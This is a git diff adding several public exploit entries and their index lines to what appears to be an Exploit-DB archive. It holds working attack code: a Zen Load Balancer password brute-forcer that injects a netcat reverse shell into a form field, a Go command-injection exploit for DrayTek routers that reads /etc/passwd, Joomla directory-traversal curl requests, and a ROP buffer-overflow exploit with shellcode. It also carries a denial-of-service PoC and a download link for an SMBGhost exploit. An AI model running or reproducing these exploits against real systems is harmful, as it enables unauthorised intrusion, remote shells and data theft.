diff --git a/exploits/cgi/webapps/48266.py b/exploits/cgi/webapps/48266.py
new file mode 100755
index 000000000..b8d533935
--- /dev/null
+++ b/exploits/cgi/webapps/48266.py
@@ -0,0 +1,110 @@
+# Exploit Title: Zen Load Balancer 3.10.1 - Remote Code Execution
+# Google Dork: no
+# Date: 2020-03-28
+# Exploit Author: Cody Sixteen
+# Vendor Homepage: https://code610.blogspot.com
+# Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download
+# Version: 3.10.1
+# Tested on: Linux 
+# CVE : CVE-2019-7301
+
+#c@kali:~/src/eonila/zenload3r$ cat zenload3r.py
+#!/usr/bin/env python
+# zenload3r.py - zen load balancer pwn3r
+# 28.03.2020 @ 22:41
+#
+# by cody sixteen
+#
+
+import base64
+import sys, re
+import requests
+import ssl
+from functools import partial
+ssl.wrap_socket = partial(ssl.wrap_socket, ssl_version=ssl.PROTOCOL_TLSv1)
+# disable ssl warnings:
+import urllib3
+urllib3.disable_warnings()
+from requests.auth import HTTPBasicAuth
+
+#
+target = sys.argv[1]
+username = 'admin'
+password = 'P@ssw0rd'
+
+def main():
+  print 'zenload3r.py - zen load balancer pwn3r'
+  print '      zenload3r.py - vs - %s' % ( target )
+  print ''
+
+  print '[+] checking if host is alive...'
+  global sess
+  sess = requests.session()
+  global baseUrl
+  baseUrl = target + ':444/index.cgi'
+  checkBaseUrl = sess.get(baseUrl, verify=False)
+  checkBaseResp = checkBaseUrl.status_code
+
+  #print checkBaseResp
+  if checkBaseResp == 401:
+    print '[i] ...it is. we need to log in to proceed'
+    logmein(baseUrl)
+
+
+def logmein(target):
+  print '[+] trying %s and default password "%s" vs %s' % (username, password, baseUrl)
+
+  #pwd_file = '/usr/share/wordlists/dirb/common.txt'
+  pwd_file = 'passwd.lst'
+
+  try:
+    read_pwds = open(pwd_file, 'r')
+    pwds = read_pwds.readlines()
+
+    for pwd in pwds:
+      pwd = pwd.rstrip()
+      logme = sess.post(baseUrl, auth=HTTPBasicAuth(username,pwd), allow_redirects=True)
+      logmeresp = logme.text
+
+      #print logmeresp
+      if '<p>Hello <strong>admin</strong>' in logmeresp:
+        print '[+] admin user logged-in! :D'
+        print '[+] working password: %s' % ( pwd )
+
+        load3r(baseUrl, pwd)
+
+  except requests.exceptions.ConnectionError:
+    print '[-] Can not connect to remote host :C\n'
+
+
+def load3r(baseUrl, pwd):
+  print '[+] time to get reverse shell, preparing...'
+
+  creds = base64.b64encode("{}:{}".format(username,pwd))
+  creds2 = creds.rstrip()
+  print 'creds: ', creds2
+
+  baseUrl = "https://192.168.1.200:444/index.cgi"
+  headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0",
+    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
+    "Accept-Language": "pl,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate",
+    "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://192.168.1.200:444",
+    "Authorization": "Basic {}".format(creds2), "Connection": "close",
+    "Referer": "https://192.168.1.200:444/index.cgi?id=1-3&action=Show_Form", "Upgrade-Insecure-Requests": "1"
+  }
+  sh = "a\";nc 192.168.1.170 4444 -e /bin/sh;#"
+  reqdata = {"cert_name": "qweqweqwe", "cert_issuer": "Sofintel",
+    "cert_fqdn": "qweqweqwe", "cert_division": "qweqweqwe",
+    "cert_organization": sh,
+    "cert_locality": "qweqweqwe", "cert_state": "qweqweqwe",
+    "cert_country": "qw", "cert_mail": "qweqweqwe@qweqweqwe.com",
+    "cert_key": "2048", "id": "1-3", "actionpost": "Generate CSR", "button": "Generate CSR"}
+
+  requests.post(baseUrl, headers=headers, data=reqdata,verify=False)
+
+  print '[*] got r00t? ;>\n'
+
+
+# run me:
+if __name__ == '__main__':
+  main()
\ No newline at end of file
diff --git a/exploits/linux/remote/48268.go b/exploits/linux/remote/48268.go
new file mode 100755
index 000000000..88ed03305
--- /dev/null
+++ b/exploits/linux/remote/48268.go
@@ -0,0 +1,87 @@
+package main
+
+
+/*
+CVE-2020-8515: DrayTek pre-auth remote root RCE
+Mon Mar 30 2020 -  0xsha.io
+Affected:
+DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta,
+and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta,
+and 1.4.4_Beta
+You should upgrade as soon as possible to 1.5.1 firmware or later
+This issue has been fixed in Vigor3900/2960/300B v1.5.1.
+read more :
+https://www.skullarmy.net/2020/01/draytek-unauthenticated-rce-in-draytek.html
+https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/
+https://thehackernews.com/2020/03/draytek-network-hacking.html
+https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/
+exploiting using keyPath
+POST /cgi-bin/mainfunction.cgi HTTP/1.1
+Host: 1.2.3.4
+Content-Length: 89
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a
+ */
+
+import (
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"net/url"
+	"os"
+	"strings"
+)
+
+func usage()  {
+
+	fmt.Println("CVE-2020-8515 exploit by  @0xsha ")
+	fmt.Println("Usage :  " + os.Args[0] + " URL " + "command"  )
+	fmt.Println("E.G :  " + os.Args[0] + " http://1.2.3.4 " + "\"uname -a\""  )
+}
+
+func main() {
+
+
+	if len(os.Args) < 3 {
+		usage()
+		os.Exit(-1)
+	}
+
+	targetUrl := os.Args[1]
+	//cmd := "cat /etc/passwd"
+	cmd := os.Args[2]
+
+
+	// payload preparation
+	vulnerableFile := "/cgi-bin/mainfunction.cgi"
+	// specially crafted CMD
+	// action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a
+	payload :=`'
+	/bin/sh -c 'CMD'
+	'`
+	payload = strings.ReplaceAll(payload,"CMD", cmd)
+	bypass := strings.ReplaceAll(payload," ", "${IFS}")
+
+	//PostForm call url encoder internally
+	resp, err := http.PostForm(targetUrl+vulnerableFile ,
+		url.Values{"action": {"login"}, "keyPath": {bypass} , "loginUser": {"a"}, "loginPwd": {"a"}   })
+
+	if err != nil{
+		fmt.Println("error connecting host")
+		os.Exit(-1)
+	}
+
+
+	defer resp.Body.Close()
+	body, err := ioutil.ReadAll(resp.Body)
+	
+	if err != nil{
+		fmt.Println("error reading data")
+		os.Exit(-1)
+	}
+	
+	fmt.Println(string(body))
+
+}
\ No newline at end of file
diff --git a/exploits/php/webapps/48263.txt b/exploits/php/webapps/48263.txt
new file mode 100644
index 000000000..826d6f5d6
--- /dev/null
+++ b/exploits/php/webapps/48263.txt
@@ -0,0 +1,65 @@
+# Exploit Title: Joomla! com_fabrik 3.9.11 - Directory Traversal
+#Google Dork: inurl:"index.php?option=com_fabrik"
+#Date: 2020-03-30
+#Exploit Author: qw3rTyTy
+#Vendor Homepage: https://fabrikar.com/
+#Software Link: https://fabrikar.com/downloads
+#Version: 3.9
+#Tested on: Debian/Nginx/Joomla! 3.9.11
+##################################################################
+#Vulnerability details
+##################################################################
+File: fabrik_element/image/image.php
+Func: onAjax_files
+
+   394          public function onAjax_files()
+   395          {
+   396                  $this->loadMeForAjax();
+   397                  $folder = $this->app->input->get('folder', '', 'string');		//!!!Possible to directory-traversal.
+   398
+   399                  if (!strstr($folder, JPATH_SITE))
+   400                  {
+   401                          $folder = JPATH_SITE . '/' . $folder;
+   402                  }
+   403
+   404                  $pathA = JPath::clean($folder);
+   405                  $folder = array();
+   406                  $files = array();
+   407                  $images = array();
+   408                  FabrikWorker::readImages($pathA, "/", $folders, $images, $this->ignoreFolders);
+   409
+   410                  if (!array_key_exists('/', $images))
+   411                  {
+   412                          $images['/'] = array();
+   413                  }
+   414
+   415                  echo json_encode($images['/']);
+   416          }
+##################################################################
+#PoC
+##################################################################
+$> curl -X GET -i "http://127.0.0.1/joomla/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/"
+
+...snip...
+[{"value":"eila.jpg","text":"eila.jpg","disable":false},{"value":"eilanya.jpg","text":"eilanya.jpg","disable":false},{"value":"topsecret.png","text":"topsecret.png","disable":false}]
+...snip...
+
+$> curl -X GET -i "http://127.0.0.1/joomla/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../home/user123/Pictures/"
+
+...snip...
+[{"value":"Revision2017_Banner.jpg","text":"Revision2017_Banner.jpg","disable":false},{"value":"Screenshot from 2019-02-23 22-43-54.png","text":"Screenshot from 2019-02-23 22-43-54.png","disable":false},{"value":"Screenshot from 2019-03-09 14-59-22.png","text":"Screenshot from 2019-03-09 14-59-22.png","disable":false},{"value":"Screenshot from 2019-03-09 14-59-25.png","text":"Screenshot from 2019-03-09 14-59-25.png","disable":false},{"value":"Screenshot from 2019-03-16 23-17-05.png","text":"Screenshot from 2019-03-16 23-17-05.png","disable":false},{"value":"Screenshot from 2019-03-18 07-30-41.png","text":"Screenshot from 2019-03-18 07-30-41.png","disable":false},{"value":"Screenshot from 2019-03-18 08-23-45.png","text":"Screenshot from 2019-03-18 08-23-45.png","disable":false},{"value":"Screenshot from 2019-04-08 00-09-36.png","text":"Screenshot from 2019-04-08 00-09-36.png","disable":false},{"value":"Screenshot from 2019-04-08 10-34-23.png","text":"Screenshot from 2019-04-08 10-34-23.png","disable":false},{"value":"Screenshot from 2019-04-13 08-23-48.png","text":"Screenshot from 2019-04-13 08-23-48.png","disable":false},{"value":"Screenshot from 2019-05-24 23-14-05.png","text":"Screenshot from 2019-05-24 23-14-05.png","disable":false},{"value":"b.jpg","text":"b.jpg","disable":false},{"value":"by_gh0uli.tumblr.com-8755.png.jpeg","text":"by_gh0uli.tumblr.com-8755.png.jpeg","disable":false},{"value":"max_payne_06.jpg","text":"max_payne_06.jpg","disable":false},{"value":"xxx.jpg","text":"xxx.jpg","disable":false}]
+...snip...
+##################################################################
+#Q&D Patch (DO NOT USE :3)
+##################################################################
+--- ./image.php ---
++++ image_patched.php   ---
+@@ -394,7 +394,7 @@
+        public function onAjax_files()
+        {
+                $this->loadMeForAjax();
+-               $folder = $this->app->input->get('folder', '', 'string');
++               $folder = $this->app->input->get('folder', '', 'cmd');
+ 
+                if (!strstr($folder, JPATH_SITE))
+                {
\ No newline at end of file
diff --git a/exploits/windows/dos/48262.py b/exploits/windows/dos/48262.py
new file mode 100755
index 000000000..98179dd17
--- /dev/null
+++ b/exploits/windows/dos/48262.py
@@ -0,0 +1,25 @@
+# Exploit Title: Odin Secure FTP Expert 7.6.3 - 'Site Info' Denial of Service (PoC)
+# Discovery by: Ivan Marmolejo
+# Discovery Date: 2020-03-27
+# Vendor Homepage: https://odin-secure-ftp-expert.jaleco.com/
+# Software Link Download : http://tr.oldversion.com/windows/odin-secure-ftp-expert-7-6-3
+# Version : Odin Secure FTP Expert 7.6.3
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Home Single Lenguage (ESP)
+
+Steps to Produce the Crash:
+
+   1.- Run python code: OdinSecureFTP.py
+   2.- Copy content to clipboard
+   3.- Open "OdinSecureFTPExpert.exe"
+   4.- Go to "Trial" > Connect > Quickconnect site
+   5.- Paste ClipBoard into the all fields
+   6.- Go to Connect
+   7.- Crashed
+
+Python "OdinSecureFTP" Code:
+   
+buffer = "\x41" * 108
+f = open ("OdinSecureFTP.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48264.py b/exploits/windows/local/48264.py
new file mode 100755
index 000000000..e6ad38b43
--- /dev/null
+++ b/exploits/windows/local/48264.py
@@ -0,0 +1,141 @@
+# Exploit Title: 10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)
+# Date: 2020-03-30
+# Exploit Author:   Hodorsec
+# Version: 9.03
+# Software Link:    https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
+# Vendor Homepage:  https://www.10-strike.com
+# Tested on:        Win8.1 x64 - Build 9600
+
+# Description:      
+# - Exploits the functionality to load a list of computers from a file
+# - Some DLL's and the main EXE don't rebase, which allowed for some instruction reusage for ROP
+# - Used a jump after ROP to go to a buffer for more space
+
+# Reproduction:
+# - Run the script, a TXT file will be generated
+# - Open the program and click on tab "Computers"
+# - Click the button "From Text File" and select the generated TXT file
+# - Clck OK and check results
+
+# WinDBG initial crash output:
+# (f54.f48): Access violation - code c0000005 (first chance)
+# First chance exceptions are reported before any exception handling.
+# This exception may be expected and handled.
+# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\10-Strike Network Inventory Explorer\NetworkInventoryExplorer.exe
+# eax=000013d3 ebx=0018f778 ecx=000002e4 edx=0018f7c0 esi=08fd8d8c edi=00190000
+# eip=00402b47 esp=0018f6e4 ebp=0018f73c iopl=0         nv up ei pl nz na po cy
+# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210203
+# NetworkInventoryExplorer+0x2b47:
+# 00402b47 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
+# 0:000> g
+# (f54.f48): Access violation - code c0000005 (first chance)
+# First chance exceptions are reported before any exception handling.
+# This exception may be expected and handled.
+# eax=0018f700 ebx=00420244 ecx=00000002 edx=08fd854c esi=0048b11c edi=08f4f388
+# eip=41414141 esp=0018f8dc ebp=41414141 iopl=0         nv up ei pl nz na po nc
+# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210202
+# 41414141 ??              ???
+
+
+#!/usr/bin/python
+
+import sys, struct
+
+filename = "poc_10_strike_nie.txt"
+
+# Maximum length
+maxlen = 5000
+
+# Offsets
+crash_esi = 2145                                                # Initial space until ESI buffer filling
+crash_seh = 217                                                 # SEH
+crash_nseh = crash_seh - 4                                      # NSEH
+landingpad = 310                                                # Space for RET NOP landingpad after stackpivoting
+
+# Shellcode
+# msfvenom -p windows/exec cmd=calc.exe -v shellcode -f python -b "\x0a\x0d\x00\x5c\x3a" exitfunc=thread
+# Payload size: 220 bytes
+shellcode =  b""
+shellcode += b"\xda\xdb\xd9\x74\x24\xf4\x5f\x2b\xc9\xbd\x06"
+shellcode += b"\xa7\x5d\x4b\xb1\x31\x83\xef\xfc\x31\x6f\x14"
+shellcode += b"\x03\x6f\x12\x45\xa8\xb7\xf2\x0b\x53\x48\x02"
+shellcode += b"\x6c\xdd\xad\x33\xac\xb9\xa6\x63\x1c\xc9\xeb"
+shellcode += b"\x8f\xd7\x9f\x1f\x04\x95\x37\x2f\xad\x10\x6e"
+shellcode += b"\x1e\x2e\x08\x52\x01\xac\x53\x87\xe1\x8d\x9b"
+shellcode += b"\xda\xe0\xca\xc6\x17\xb0\x83\x8d\x8a\x25\xa0"
+shellcode += b"\xd8\x16\xcd\xfa\xcd\x1e\x32\x4a\xef\x0f\xe5"
+shellcode += b"\xc1\xb6\x8f\x07\x06\xc3\x99\x1f\x4b\xee\x50"
+shellcode += b"\xab\xbf\x84\x62\x7d\x8e\x65\xc8\x40\x3f\x94"
+shellcode += b"\x10\x84\x87\x47\x67\xfc\xf4\xfa\x70\x3b\x87"
+shellcode += b"\x20\xf4\xd8\x2f\xa2\xae\x04\xce\x67\x28\xce"
+shellcode += b"\xdc\xcc\x3e\x88\xc0\xd3\x93\xa2\xfc\x58\x12"
+shellcode += b"\x65\x75\x1a\x31\xa1\xde\xf8\x58\xf0\xba\xaf"
+shellcode += b"\x65\xe2\x65\x0f\xc0\x68\x8b\x44\x79\x33\xc1"
+shellcode += b"\x9b\x0f\x49\xa7\x9c\x0f\x52\x97\xf4\x3e\xd9"
+shellcode += b"\x78\x82\xbe\x08\x3d\x6c\x5d\x99\x4b\x05\xf8"
+shellcode += b"\x48\xf6\x48\xfb\xa6\x34\x75\x78\x43\xc4\x82"
+shellcode += b"\x60\x26\xc1\xcf\x26\xda\xbb\x40\xc3\xdc\x68"
+shellcode += b"\x60\xc6\xbe\xef\xf2\x8a\x6e\x8a\x72\x28\x6f"
+
+# ROP chain
+def create_rop_chain():
+    # rop chain generated with mona.py - www.corelan.be
+    rop_gadgets = [
+      0x7c344efe,  # POP EDX # RETN [MSVCR71.dll] 
+      0x61e9b30c,  # ptr to &VirtualProtect() [IAT sqlite3.dll]
+      0x010283e5,  # MOV EAX,DWORD PTR DS:[EDX] # RETN [NetworkInventoryExplorer.exe] 
+      0x010296a1,  # XCHG EAX,ESI # ADD AL,BYTE PTR DS:[ECX] # RETN [NetworkInventoryExplorer.exe] 
+      0x61e7555f,  # POP EBP # RETN [sqlite3.dll] 
+      0x61e63eaf,  # & push esp # ret 0x04 [sqlite3.dll]
+      0x7c37678f,  # POP EAX # RETN [MSVCR71.dll] 
+      0xfffffdff,  # Value to negate, will become 0x00000201
+      0x7c34d749,  # NEG EAX # RETN [MSVCR71.dll] 
+      0x0102a8a0,  # POP EBX # RETN [NetworkInventoryExplorer.exe] 
+      0xffffffff,  #  
+      0x61e0579d,  # INC EBX # RETN [sqlite3.dll] 
+      0x0102104a,  # ADD EBX,EAX # RETN [NetworkInventoryExplorer.exe] 
+      0x7c3458e6,  # POP EDX # RETN [MSVCR71.dll] 
+      0xffffffc0,  # Value to negate, will become 0x00000040
+      0x7c351eb1,  # NEG EDX # RETN [MSVCR71.dll] 
+      0x7c369c4a,  # POP ECX # RETN [MSVCR71.dll] 
+      0x7c38dfd7,  # &Writable location [MSVCR71.dll]
+      0x7c34a40e,  # POP EDI # RETN [MSVCR71.dll] 
+      0x0101da30,  # RETN (ROP NOP) [NetworkInventoryExplorer.exe]
+      0x01014218,  # POP EAX # RETN [NetworkInventoryExplorer.exe] 
+      0x90909090,  # nop
+      0x01014244,  # PUSHAD # RETN [NetworkInventoryExplorer.exe] 
+    ]
+    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
+rop_chain = create_rop_chain()
+
+# NOPPING
+retnop = struct.pack("<L", 0x61e0103e)                          # RET # sqlite3.dll
+prenop = "\x90" * 200                                           # Pre NOP's after jumping back in stack, sledding until shellcode
+postnop = "\x90" * 16                                           # Post NOP's after running ROP chain to disable DEP
+
+# Jump back on stack for payload space
+jmpback = "\xe9\x9f\xf9\xff\xff"                                # jmp 0xfffff9a4 # Jump back on stack for more space
+
+# Prefix
+prefix = "A" * crash_nseh                                       # Junk until NSEH
+nseh = "B" * 4                                                  # Junk again, no use for NSEH
+seh = struct.pack("<L", 0x0101ce0b)                             # ADD ESP,0BDC # RETN 0x0C    ** [NetworkInventoryExplorer.exe] ** # Stackpivot
+suffix = prenop                                                 # Prenopping until shellcode
+suffix += shellcode                                             # Magic!
+suffix += retnop * landingpad                                   # RET NOP as a landingpad after stackpivot, still having DEP enabled
+suffix += rop_chain                                             # Disable DEP
+suffix += postnop                                               # Old school NOP-sledding
+suffix += jmpback                                               # Jump! Just like van Halen
+suffix += "C" * (maxlen - len(prefix + nseh + seh + suffix))    # Junk for filling
+
+# Concatenate string for payload
+payload = prefix + nseh + seh + suffix                          # Put it all together
+
+try:
+    file = open(filename,"wb")
+    file.write(payload)
+    file.close()
+    print "[+] File " + filename + " with size " + str(len(payload)) + " created successfully"
+except:
+    print "[!] Error creating file!"
+    sys.exit(0)
\ No newline at end of file
diff --git a/exploits/windows/local/48267.txt b/exploits/windows/local/48267.txt
new file mode 100644
index 000000000..d61aaa519
--- /dev/null
+++ b/exploits/windows/local/48267.txt
@@ -0,0 +1,22 @@
+# CVE-2020-0796
+
+Windows SMBv3 LPE Exploit
+
+![exploit](https://user-images.githubusercontent.com/1675387/77913732-110d4f80-7295-11ea-9af6-f17201c66673.gif)
+
+## Authors
+
+  * Daniel García Gutiérrez ([@danigargu](https://twitter.com/danigargu))
+  * Manuel Blanco Parajón ([@dialluvioso_](https://twitter.com/dialluvioso_))
+
+## References
+
+* https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796
+* https://www.synacktiv.com/posts/exploit/im-smbghost-daba-dee-daba-da.html
+* https://www.fortinet.com/blog/threat-research/cve-2020-0796-memory-corruption-vulnerability-in-windows-10-smb-server.html#.Xndfn0lv150.twitter
+* https://www.mcafee.com/blogs/other-blogs/mcafee-labs/smbghost-analysis-of-cve-2020-0796/
+* http://blogs.360.cn/post/CVE-2020-0796.html
+* https://blog.zecops.com/vulnerabilities/vulnerability-reproduction-cve-2020-0796-poc/
+
+
+Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48267.zip
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 660a52921..b78873661 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -4781,6 +4781,7 @@ id,file,description,date,author,type,platform,port
 38348,exploits/windows/dos/38348.txt,"Adobe Flash - 'uint' Capacity Field",2015-09-28,"Google Security Research",dos,windows,
 38364,exploits/multiple/dos/38364.txt,"Varnish Cache - Multiple Denial of Service Vulnerabilities",2013-03-05,tytusromekiatomek,dos,multiple,
 38365,exploits/linux/dos/38365.txt,"Squid - 'httpMakeVaryMark()' Remote Denial of Service",2013-03-05,tytusromekiatomek,dos,linux,
+48262,exploits/windows/dos/48262.py,"Odin Secure FTP Expert 7.6.3 - 'Site Info' Denial of Service (PoC)",2020-03-30,"Ivan Marmolejo",dos,windows,
 38392,exploits/linux/dos/38392.txt,"MySQL / MariaDB - Geometry Query Denial of Service",2013-03-07,"Alyssa Milburn",dos,linux,
 38399,exploits/windows/dos/38399.py,"LanSpy 2.0.0.155 - Buffer Overflow (PoC)",2015-10-05,hyp3rlinx,dos,windows,
 38404,exploits/windows/dos/38404.py,"LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow (PoC)",2015-10-06,hyp3rlinx,dos,windows,
@@ -11003,6 +11004,8 @@ id,file,description,date,author,type,platform,port
 48251,exploits/windows/local/48251.txt,"10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path",2020-03-25,"Felipe Winsnes",local,windows,
 48253,exploits/windows/local/48253.py,"10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)",2020-03-25,"Felipe Winsnes",local,windows,
 48257,exploits/windows/local/48257.py,"Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)",2020-03-27,"Felipe Winsnes",local,windows,
+48264,exploits/windows/local/48264.py,"10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)",2020-03-30,Hodorsec,local,windows,
+48267,exploits/windows/local/48267.txt,"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation",2020-03-30,"Daniel García Gutiérrez",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18061,6 +18064,7 @@ id,file,description,date,author,type,platform,port
 48228,exploits/hardware/remote/48228.txt,"Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)",2020-03-18,FarazPajohan,remote,hardware,
 48233,exploits/multiple/remote/48233.py,"Broadcom Wi-Fi Devices - 'KR00K Information Disclosure",2020-03-18,"Maurizio S",remote,multiple,
 48239,exploits/multiple/remote/48239.txt,"CyberArk PSMP 10.9.1 - Policy Restriction Bypass",2020-03-23,"LAHBAL Said",remote,multiple,
+48268,exploits/linux/remote/48268.go,"Multiple DrayTek Products - Pre-authentication Remote Root Code Execution",2020-03-30,0xsha,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42505,6 +42509,8 @@ id,file,description,date,author,type,platform,port
 48250,exploits/php/webapps/48250.txt,"LeptonCMS 4.5.0 - Persistent Cross-Site Scripting",2020-03-25,SunCSR,webapps,php,
 48255,exploits/hardware/webapps/48255.py,"TP-Link Archer C50 3 - Denial of Service (PoC)",2020-03-26,thewhiteh4t,webapps,hardware,
 48256,exploits/php/webapps/48256.py,"Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution",2020-03-26,"Engin Demirbilek",webapps,php,
-48258,exploits/php/webapps/48258.txt,"ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin)",2020-03-27,"Alperen Soydan",webapps,php,
+48258,exploits/php/webapps/48258.txt,"ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin)",2020-03-27,"Mustafa Emre Gül",webapps,php,
 48260,exploits/java/webapps/48260.py,"Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal",2020-03-27,hongphukt,webapps,java,
 48261,exploits/php/webapps/48261.py,"rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution",2020-03-27,vikingfr,webapps,php,
+48263,exploits/php/webapps/48263.txt,"Joomla! com_fabrik 3.9.11 - Directory Traversal",2020-03-30,qw3rTyTy,webapps,php,
+48266,exploits/cgi/webapps/48266.py,"Zen Load Balancer 3.10.1 - Remote Code Execution",2020-03-30,"Cody Sixteen",webapps,cgi,